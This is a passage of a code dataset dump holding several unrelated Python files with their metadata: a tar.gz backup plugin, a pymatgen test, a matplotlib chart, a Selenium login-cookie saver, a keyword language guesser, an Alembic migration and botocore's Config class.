"line_number": 34, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 36, "usage_type": "call"}, {"api_name": "face_recognition.face_distance", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "632583726", "text": "#!/usr/bin/env python3\n\"\"\"targz plugin for the archive wrapper.\n\nBearable: Tolerable backup and restore.\nhttps://www.github.com/Effenberg0x0/bearable\n\nAlvaro Leal , 2019\n\"\"\"\nimport tarfile\n# from os.path import basename\nimport uuid\nimport os\nimport json\nfrom os import path\n\n\nclass Archive(object):\n\n def get_unique_filename(self, filename):\n return filename + '.' + str(uuid.uuid4())\n\n def create_from_buffer(self, buffer, buffer_filename, tarfile_path):\n tmp_file_name = self.get_unique_filename(buffer_filename)\n with open(tmp_file_name, 'w') as tmp_file:\n tmp_file.write(json.dumps(buffer))\n\n tar_file = tarfile.open(tarfile_path, \"w|gz\")\n tar_file.add(name=tmp_file_name, arcname=buffer_filename, recursive=False)\n tar_file.close()\n os.remove(tmp_file_name)\n\n def create(self, archive_path, file_paths, dirname, save_full_path=False):\n tar = tarfile.open(archive_path, \"w:gz\")\n print(\"ARCHIVE_PATH: {0}\".format(archive_path))\n if not save_full_path:\n base_path = os.path.commonpath(file_paths)\n\n for _file in file_paths:\n if not save_full_path:\n arcname = _file[_file.find(base_path) + len(base_path):] \n else:\n arcname = _file\n\n arcname = '/' + dirname + arcname\n tar.add(name=_file, arcname=arcname, recursive=False)\n tar.close()\n\n def extract(self, archive_path, destination_path):\n if not path.isfile(archive_path):\n raise FileNotFoundError(\"Source archive not found.\")\n\n if not path.isdir(destination_path):\n raise FileNotFoundError(\"Destination dir not found.\")\n\n archive = tarfile.open(archive_path)\n archive.extractall(path=destination_path)", "sub_path": "plugins/archive/targz.py", "file_name": "targz.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 25, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 27, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 30, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.commonpath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "151533077", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"test for parse_atat\"\"\"\nfrom __future__ import division\nimport os\nimport unittest\nfrom pymatgen.io.vasp import Poscar\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\n__date__ = 'Mar 28 2017'\n\nTEST_PATH = '/Users/enoki/Researches/Analysis/Codes/01_testRun/'\n\n\ndef main():\n \"\"\"\n Test\n \"\"\"\n unittest.main()\n\n\nclass Test(unittest.TestCase): #pylint: 
disable=R0903\n    \"\"\"\n    On the problem of the space group changing unexpectedly\n    \"\"\"\n    PATH = os.path.join(TEST_PATH, 'vasp_poscar')\n\n    def test_read_str(self):\n        \"\"\" read_str \"\"\"\n        src = os.path.join(self.PATH, 'POSCAR_GS2_34246_cart')\n        srcpos = Poscar.from_file(src)\n        dst = os.path.join(self.PATH, 'POSCAR_GS2_34246_remake')\n        srcpos.write_file(dst)\n        print(srcpos)\n        finder = SpacegroupAnalyzer(srcpos.structure)\n        spg = finder.get_space_group_symbol()\n        print(spg)\n\n        prim_str = finder.get_primitive_standard_structure()\n        finder2 = SpacegroupAnalyzer(prim_str)\n        spg2 = finder2.get_space_group_symbol()\n        print(spg2)\n        # print(finder)\n\n        src = os.path.join(self.PATH, 'SPOSCAR')\n        srcpos = Poscar.from_file(src)\n        finder = SpacegroupAnalyzer(srcpos.structure)\n        spg = finder.get_space_group_symbol()\n        print(spg)\n\n        # prim_str = finder.get_primitive_standard_structure()\n        prim_str = finder.get_conventional_standard_structure()\n        finder2 = SpacegroupAnalyzer(prim_str)\n        spg2 = finder2.get_space_group_symbol()\n        dst2 = os.path.join(self.PATH, 'POSCAR_GS2_34246_remake2')\n        dstpos = Poscar(prim_str)\n        dstpos.write_file(dst2)\n        # print(spg2)\n\n    def _test_withoutN(self):\n        \"\"\" withoutN \"\"\"\n        src = os.path.join(self.PATH, 'POSCAR_withoutN')\n        srcpos = Poscar.from_file(src)\n        dst = os.path.join(self.PATH, 'POSCAR_withoutN_remake')\n        srcpos.write_file(dst)\n        print(srcpos)\n        finder = SpacegroupAnalyzer(srcpos.structure)\n        spg = finder.get_space_group_symbol()\n        print(spg)\n\n        # prim_str = finder.get_primitive_standard_structure()\n        # finder2 = SpacegroupAnalyzer(prim_str)\n        # spg2 = finder2.get_space_group_symbol()\n        # print(spg2)\n\n        # std_str = finder.get_conventional_standard_structure()\n\n\n\n\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "test/test_vasp_poscar.py", "file_name": "test_vasp_poscar.py", "file_ext": "py", "file_size_in_byte": 2417, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.main", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 31, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 35, "usage_type": "call"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 46, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 46, "usage_type": "name"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 47, "usage_type": "call"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 55, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pymatgen.io.vasp.Poscar.from_file", "line_number": 63, "usage_type": "call"}, {"api_name": "pymatgen.io.vasp.Poscar", "line_number": 63, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pymatgen.symmetry.analyzer.SpacegroupAnalyzer", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "339849957", "text": "import matplotlib.pyplot as plt\nfont = {'family' : 'MicroSoft YaHei',\n 'weight' : 'bold'\n }\nplt.rc('font', **font)\n#绘制横着的条形图\na = ['战狼2','速激2','变形金刚5','摔跤吧爸爸']\nb = [56.01,26.94,44.9,39.2]\nx = len(a)\nplt.figure(figsize=(15,10),dpi=100)\nplt.barh(a,b,height=0.3)\nplt.savefig(\"../imag/piaofang.png\")", "sub_path": "code/py_matplotlib/ex4.py", "file_name": "ex4.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.rc", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "482457222", "text": "import json\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\nopts = Options()\nopts.add_argument(\n \"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36\")\n# opts.add_argument('--headless') # 无头模式\n\ndriver = webdriver.Chrome(chrome_options=opts)\n\n\ndef Login():\n driver.get(\"http://s.dianping.com/event/shenzhen\")\n login = driver.find_element_by_xpath('//*[contains(text(),\"登录\")]')\n login.click()\n print('请扫描登录')\n sleep(10)\n dp = driver.get_cookie('dper')\n if dp is not None:\n print(dp)\n with open(\"dper.txt\", \"r+\") as f:\n f.seek(0)\n f.write(dp['value'])\n f.write('\\n')\n print('登录成功,dper存入成功')\n else:\n print('未登录成功,dper存取失败')\n\n\n\n#\n# def writeCookies(cookies):\n# \"\"\"\n# 从浏览器中向文件写入cookies\n# \"\"\"\n# with open(\"cookies.json\", \"w\") as f:\n# json.dump(cookies, f)\n\n\nif __name__ == '__main__':\n try:\n Login()\n except Exception as e:\n print(e)\n # driver.quit()\n print('退出浏览器了')\n", "sub_path": "src/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 12, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}]} +{"seq_id": 
"72457447", "text": "#!/usr/bin/env python\n\n## Benjamin Williams \n## \n## --\n## Tower of Babel script, determines which language a particular piece of text is\n## by making use of nltk.\n##\n\nimport nltk;\n\ncommonWords = {\n\t\"English\" : [\n\t\t\"the\", \"of\", \"and\", \"to\", \"in\", \"i\", \"that\", \"was\", \"his\", \"he\", \"it\", \"with\", \"is\", \"for\", \"as\", \"had\", \"you\", \"not\", \n\t\t\"be\", \"her\", \"on\", \"at\", \"by\", \"which\", \"have\", \"or\", \"from\", \"this\", \"him\", \"but\", \"all\", \"she\", \"they\", \"were\", \"my\",\n\t\t\"are\", \"me\"\n\t],\n\t\n\t\"Spanish\" : [\n\t\t\"que\", \"de\", \"no\", \"a\", \"la\", \"el\", \"es\", \"y\", \"en\", \"lo\", \"un\", \"por\", \"me\", \"una\", \"te\", \"los\", \"se\", \"con\", \"para\",\n\t\t\"mi\", \"esta\", \"si\", \"bien\", \"pero\", \"yo\", \"eso\", \"las\", \"su\", \"tu\", \"aqui\", \"del\", \"al\", \"como\", \"le\", \"mas\"\n\t],\n\t\n\t\"German\" : [\n\t\t\"der\", \"und\", \"die\", \"in\", \"ist\", \"von\", \"den\", \"des\", \"eine\", \"im\", \"ein\", \"mit\", \"das\", \"zu\", \"für\", \"dem\", \"sich\",\n\t\t\"auf\", \"als\", \"auch\", \"wird\", \"oder\", \"aus\", \"wurde\", \"werden\", \"sind\", \"an\", \"einer\", \"nicht\", \"durch\", \"nach\", \"bei\",\n\t\t\"es\", \"war\", \"zum\", \"er\", \"zur\", \"am\", \"einem\", \"einen\", \"sie\", \"bis\", \"man\", \"über\", \"um\", \"dass\", \"wie\", \"hat\", \"eines\",\n\t\t\"nur\", \"Stadt\", \"kann\", \"bezeichnet\", \"noch\", \"aber\", \"siehe\", \"vor\", \"so\", \"unter\"\n\t],\n\t\n\t\"Dutch\" : [\n\t\t\"de\", \"van\", \"een\", \"het\", \"en\", \"in\", \"is\", \"dat\", \"op\", \"te\", \"De\", \"zijn\", \"voor\", \"met\", \"die\", \"niet\", \"aan\", \"er\", \n\t\t\"om\", \"Het\", \"ook\", \"als\", \"dan\", \"maar\", \"bij\", \"of\", \"uit\", \"nog\", \"worden\", \"door\", \"naar\", \"heeft\", \"tot\", \"ze\", \"wordt\",\n\t\t\"over\", \"hij\", \"In\", \"meer\", \"jaar\", \"was\", \"ik\", \"kan\", \"je\"\n\t],\n\t\n\t\"Croatian\" : [\n\t\t\"je\", \"da\", \"ne\", \"se\", \"to\", \"sam\", \"što\", \"na\", \"ti\", \"si\", \"mi\", \"za\", \"li\", \"ja\", \"su\", \"ali\", \"nije\", \"me\", \"ga\", \"te\",\n\t\t\"ovo\", \"samo\", \"bi\", \"kako\", \"od\", \"će\", \"sa\", \"dobro\", \"smo\", \"ako\", \"sve\", \"ću\", \"kao\", \"tako\", \"znam\", \"biti\", \"ovdje\",\n\t\t\"nisam\", \"mogu\", \"ste\", \"bio\", \"zašto\", \"još\", \"pa\", \"nešto\", \"redu\", \"on\", \"bilo\", \"koji\", \"vas\"\n\t]\n};\n\nwhile True:\n\t#Get input and split it\n\tsentence = input(\"[Enter a sentence]\\r\\n$ \");\n\tsentenceChunks = nltk.word_tokenize(sentence);\n\n\t#Get the keys and setup another dictionary for counts of each language\n\tkeys = list(commonWords.keys());\n\tfreqCounts = dict(zip(keys, [ 0 ] * len(keys)));\n\n\t#Run through each word, if the word is in the common words, increment the counter\n\t#for the language.\n\tfor chunk in sentenceChunks:\n\t\tfor key in commonWords:\n\t\t\tif chunk in commonWords[key]:\n\t\t\t\tfreqCounts[key] += 1;\n\t\t\n\t#Find the language with the highest count\n\thighestValue = max(freqCounts.values());\n\n\t#Find all values and keys of the frequency count\n\tvalues = list(freqCounts.values());\n\tkeys = list(freqCounts.keys());\n\n\t#If there are more than one values in the frequency count dict with the same highest value,\n\t#we have a tie\n\tif values.count(highestValue) > 1:\n\t\tprint(\"I couldn't determine what language you typed.\\r\\n\");\n\t\t\n\t#Otherwise display the highest ranking (most likely) 
language\n\telse:\n\t\tindex = values.index(highestValue);\n\t\tprint(\"I think the language is \" + keys[index] + \"\\r\\n\");\n\t\t\n\t#And display the \"reasoning\"\n\t#print(\"\\r\\nREASONING (count of words matched)\");\n\t#print( \"----------------------------------\");\n\t#for key, value in freqCounts.items():\n\t#\tprint(\"%-10s --> %-3d\" % (key, value));\n\n", "sub_path": "lab4/babel.py", "file_name": "babel.py", "file_ext": "py", "file_size_in_byte": 3258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "nltk.word_tokenize", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "550891620", "text": "\"\"\"added skipped_wells table\n\nRevision ID: ef256df5169c\nRevises: 5181de7d6275\nCreate Date: 2017-05-10 10:27:49.116133\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef256df5169c'\ndown_revision = '5181de7d6275'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('skipped_wells',\n sa.Column('schedule_id', sa.Integer(), nullable=True),\n sa.Column('well_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['schedule_id'], ['schedule.id'], ),\n sa.ForeignKeyConstraint(['well_id'], ['well.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('skipped_wells')\n # ### end Alembic commands ###\n", "sub_path": "alembic/versions/ef256df5169c_added_skipped_wells_table.py", "file_name": "ef256df5169c_added_skipped_wells_table.py", "file_ext": "py", "file_size_in_byte": 860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "458216766", "text": "# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. 
See the License for the specific\n# language governing permissions and limitations under the License.\nimport copy\n\nfrom botocore.compat import OrderedDict\nfrom botocore.endpoint import DEFAULT_TIMEOUT, MAX_POOL_CONNECTIONS\nfrom botocore.exceptions import (\n InvalidMaxRetryAttemptsError,\n InvalidRetryConfigurationError,\n InvalidRetryModeError,\n InvalidS3AddressingStyleError,\n)\n\n\nclass Config:\n \"\"\"Advanced configuration for Botocore clients.\n\n :type region_name: str\n :param region_name: The region to use in instantiating the client\n\n :type signature_version: str\n :param signature_version: The signature version when signing requests.\n\n :type user_agent: str\n :param user_agent: The value to use in the User-Agent header.\n\n :type user_agent_extra: str\n :param user_agent_extra: The value to append to the current User-Agent\n header value.\n\n :type user_agent_appid: str\n :param user_agent_appid: A value that gets included in the User-Agent\n string in the format \"app/\". Allowed characters are\n ASCII alphanumerics and ``!$%&'*+-.^_`|~``. All other characters will\n be replaced by a ``-``.\n\n :type connect_timeout: float or int\n :param connect_timeout: The time in seconds till a timeout exception is\n thrown when attempting to make a connection. The default is 60\n seconds.\n\n :type read_timeout: float or int\n :param read_timeout: The time in seconds till a timeout exception is\n thrown when attempting to read from a connection. The default is\n 60 seconds.\n\n :type parameter_validation: bool\n :param parameter_validation: Whether parameter validation should occur\n when serializing requests. The default is True. You can disable\n parameter validation for performance reasons. Otherwise, it's\n recommended to leave parameter validation enabled.\n\n :type max_pool_connections: int\n :param max_pool_connections: The maximum number of connections to\n keep in a connection pool. If this value is not set, the default\n value of 10 is used.\n\n :type proxies: dict\n :param proxies: A dictionary of proxy servers to use by protocol or\n endpoint, e.g.:\n ``{'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}``.\n The proxies are used on each request.\n\n :type proxies_config: dict\n :param proxies_config: A dictionary of additional proxy configurations.\n Valid keys are:\n\n * ``proxy_ca_bundle`` -- The path to a custom certificate bundle to use\n when establishing SSL/TLS connections with proxy.\n\n * ``proxy_client_cert`` -- The path to a certificate for proxy\n TLS client authentication.\n\n When a string is provided it is treated as a path to a proxy client\n certificate. When a two element tuple is provided, it will be\n interpreted as the path to the client certificate, and the path\n to the certificate key.\n\n * ``proxy_use_forwarding_for_https`` -- For HTTPS proxies,\n forward your requests to HTTPS destinations with an absolute\n URI. We strongly recommend you only use this option with\n trusted or corporate proxies. Value must be boolean.\n\n :type s3: dict\n :param s3: A dictionary of S3 specific configurations.\n Valid keys are:\n\n * ``use_accelerate_endpoint`` -- Refers to whether to use the S3\n Accelerate endpoint. The value must be a boolean. If True, the\n client will use the S3 Accelerate endpoint. If the S3 Accelerate\n endpoint is being used then the addressing style will always\n be virtual.\n\n * ``payload_signing_enabled`` -- Refers to whether or not to SHA256\n sign sigv4 payloads. 
By default, this is disabled for streaming\n uploads (UploadPart and PutObject).\n\n * ``addressing_style`` -- Refers to the style in which to address\n s3 endpoints. Values must be a string that equals one of:\n\n * ``auto`` -- Addressing style is chosen for user. Depending\n on the configuration of client, the endpoint may be addressed in\n the virtual or the path style. Note that this is the default\n behavior if no style is specified.\n\n * ``virtual`` -- Addressing style is always virtual. The name of the\n bucket must be DNS compatible or an exception will be thrown.\n Endpoints will be addressed as such: ``mybucket.s3.amazonaws.com``\n\n * ``path`` -- Addressing style is always by path. Endpoints will be\n addressed as such: ``s3.amazonaws.com/mybucket``\n\n * ``us_east_1_regional_endpoint`` -- Refers to what S3 endpoint to use\n when the region is configured to be us-east-1. Values must be a\n string that equals:\n\n * ``regional`` -- Use the us-east-1.amazonaws.com endpoint if the\n client is configured to use the us-east-1 region.\n\n * ``legacy`` -- Use the s3.amazonaws.com endpoint if the client is\n configured to use the us-east-1 region. This is the default if\n the configuration option is not specified.\n\n\n :type retries: dict\n :param retries: A dictionary for configuration related to retry behavior.\n Valid keys are:\n\n * ``total_max_attempts`` -- An integer representing the maximum number of\n total attempts that will be made on a single request. This includes\n the initial request, so a value of 1 indicates that no requests\n will be retried. If ``total_max_attempts`` and ``max_attempts``\n are both provided, ``total_max_attempts`` takes precedence.\n ``total_max_attempts`` is preferred over ``max_attempts`` because\n it maps to the ``AWS_MAX_ATTEMPTS`` environment variable and\n the ``max_attempts`` config file value.\n * ``max_attempts`` -- An integer representing the maximum number of\n retry attempts that will be made on a single request. For\n example, setting this value to 2 will result in the request\n being retried at most two times after the initial request. Setting\n this value to 0 will result in no retries ever being attempted after\n the initial request. If not provided, the number of retries will\n default to the value specified in the service model, which is\n typically four retries.\n * ``mode`` -- A string representing the type of retry mode botocore\n should use. Valid values are:\n\n * ``legacy`` - The pre-existing retry behavior.\n\n * ``standard`` - The standardized set of retry rules. This will also\n default to 3 max attempts unless overridden.\n\n * ``adaptive`` - Retries with additional client side throttling.\n\n :type client_cert: str, (str, str)\n :param client_cert: The path to a certificate for TLS client authentication.\n\n When a string is provided it is treated as a path to a client\n certificate to be used when creating a TLS connection.\n\n If a client key is to be provided alongside the client certificate the\n client_cert should be set to a tuple of length two where the first\n element is the path to the client certificate and the second element is\n the path to the certificate key.\n\n :type inject_host_prefix: bool\n :param inject_host_prefix: Whether host prefix injection should occur.\n\n Defaults to True.\n\n Setting this to False disables the injection of operation parameters\n into the prefix of the hostname. 
This is useful for clients providing\n custom endpoints that should not have their host prefix modified.\n\n :type use_dualstack_endpoint: bool\n :param use_dualstack_endpoint: Setting to True enables dualstack\n endpoint resolution.\n\n Defaults to None.\n\n :type use_fips_endpoint: bool\n :param use_fips_endpoint: Setting to True enables fips\n endpoint resolution.\n\n Defaults to None.\n\n :type ignore_configured_endpoint_urls: bool\n :param ignore_configured_endpoint_urls: Setting to True disables use\n of endpoint URLs provided via environment variables and\n the shared configuration file.\n\n Defaults to None.\n\n :type tcp_keepalive: bool\n :param tcp_keepalive: Enables the TCP Keep-Alive socket option used when\n creating new connections if set to True.\n\n Defaults to False.\n\n :type request_min_compression_size_bytes: int\n :param request_min_compression_bytes: The minimum size in bytes that a\n request body should be to trigger compression. All requests with streaming\n input that don't contain the `requiresLength` trait will be compressed\n regardless of this setting.\n\n Defaults to None.\n\n :type disable_request_compression: bool\n :param disable_request_compression: Disables request body compression if\n set to True.\n\n Defaults to None.\n \"\"\"\n\n OPTION_DEFAULTS = OrderedDict(\n [\n ('region_name', None),\n ('signature_version', None),\n ('user_agent', None),\n ('user_agent_extra', None),\n ('user_agent_appid', None),\n ('connect_timeout', DEFAULT_TIMEOUT),\n ('read_timeout', DEFAULT_TIMEOUT),\n ('parameter_validation', True),\n ('max_pool_connections', MAX_POOL_CONNECTIONS),\n ('proxies', None),\n ('proxies_config', None),\n ('s3', None),\n ('retries', None),\n ('client_cert', None),\n ('inject_host_prefix', True),\n ('endpoint_discovery_enabled', None),\n ('use_dualstack_endpoint', None),\n ('use_fips_endpoint', None),\n ('ignore_configured_endpoint_urls', None),\n ('defaults_mode', None),\n ('tcp_keepalive', None),\n ('request_min_compression_size_bytes', None),\n ('disable_request_compression', None),\n ]\n )\n\n NON_LEGACY_OPTION_DEFAULTS = {\n 'connect_timeout': None,\n }\n\n def __init__(self, *args, **kwargs):\n self._user_provided_options = self._record_user_provided_options(\n args, kwargs\n )\n\n # Merge the user_provided options onto the default options\n config_vars = copy.copy(self.OPTION_DEFAULTS)\n defaults_mode = self._user_provided_options.get(\n 'defaults_mode', 'legacy'\n )\n if defaults_mode != 'legacy':\n config_vars.update(self.NON_LEGACY_OPTION_DEFAULTS)\n config_vars.update(self._user_provided_options)\n\n # Set the attributes based on the config_vars\n for key, value in config_vars.items():\n setattr(self, key, value)\n\n # Validate the s3 options\n self._validate_s3_configuration(self.s3)\n\n self._validate_retry_configuration(self.retries)\n\n def _record_user_provided_options(self, args, kwargs):\n option_order = list(self.OPTION_DEFAULTS)\n user_provided_options = {}\n\n # Iterate through the kwargs passed through to the constructor and\n # map valid keys to the dictionary\n for key, value in kwargs.items():\n if key in self.OPTION_DEFAULTS:\n user_provided_options[key] = value\n # The key must exist in the available options\n else:\n raise TypeError(f\"Got unexpected keyword argument '{key}'\")\n\n # The number of args should not be longer than the allowed\n # options\n if len(args) > len(option_order):\n raise TypeError(\n f\"Takes at most {len(option_order)} arguments ({len(args)} given)\"\n )\n\n # Iterate through the args passed 
through to the constructor and map\n # them to appropriate keys.\n for i, arg in enumerate(args):\n # If it a kwarg was specified for the arg, then error out\n if option_order[i] in user_provided_options:\n raise TypeError(\n f\"Got multiple values for keyword argument '{option_order[i]}'\"\n )\n user_provided_options[option_order[i]] = arg\n\n return user_provided_options\n\n def _validate_s3_configuration(self, s3):\n if s3 is not None:\n addressing_style = s3.get('addressing_style')\n if addressing_style not in ['virtual', 'auto', 'path', None]:\n raise InvalidS3AddressingStyleError(\n s3_addressing_style=addressing_style\n )\n\n def _validate_retry_configuration(self, retries):\n valid_options = ('max_attempts', 'mode', 'total_max_attempts')\n valid_modes = ('legacy', 'standard', 'adaptive')\n if retries is not None:\n for key, value in retries.items():\n if key not in valid_options:\n raise InvalidRetryConfigurationError(\n retry_config_option=key,\n valid_options=valid_options,\n )\n if key == 'max_attempts' and value < 0:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=0,\n )\n if key == 'total_max_attempts' and value < 1:\n raise InvalidMaxRetryAttemptsError(\n provided_max_attempts=value,\n min_value=1,\n )\n if key == 'mode' and value not in valid_modes:\n raise InvalidRetryModeError(\n provided_retry_mode=value,\n valid_modes=valid_modes,\n )\n\n def merge(self, other_config):\n \"\"\"Merges the config object with another config object\n\n This will merge in all non-default values from the provided config\n and return a new config object\n\n :type other_config: botocore.config.Config\n :param other config: Another config object to merge with. The values\n in the provided config object will take precedence in the merging\n\n :returns: A config object built from the merged values of both\n config objects.\n \"\"\"\n # Make a copy of the current attributes in the config object.\n config_options = copy.copy(self._user_provided_options)\n\n # Merge in the user provided options from the other config\n config_options.update(other_config._user_provided_options)\n\n # Return a new config object with the merged properties.\n return Config(**config_options)\n", "sub_path": "botocore/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 15129, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "botocore.compat.OrderedDict", "line_number": 225, "usage_type": "call"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 232, "usage_type": "name"}, {"api_name": "botocore.endpoint.DEFAULT_TIMEOUT", "line_number": 233, "usage_type": "name"}, {"api_name": "botocore.endpoint.MAX_POOL_CONNECTIONS", "line_number": 235, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 263, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidS3AddressingStyleError", "line_number": 316, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryConfigurationError", "line_number": 326, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 331, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidMaxRetryAttemptsError", "line_number": 336, "usage_type": "call"}, {"api_name": "botocore.exceptions.InvalidRetryModeError", "line_number": 341, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 360, "usage_type": "call"}]} +{"seq_id": "548541204", "text": "import random\nimport 
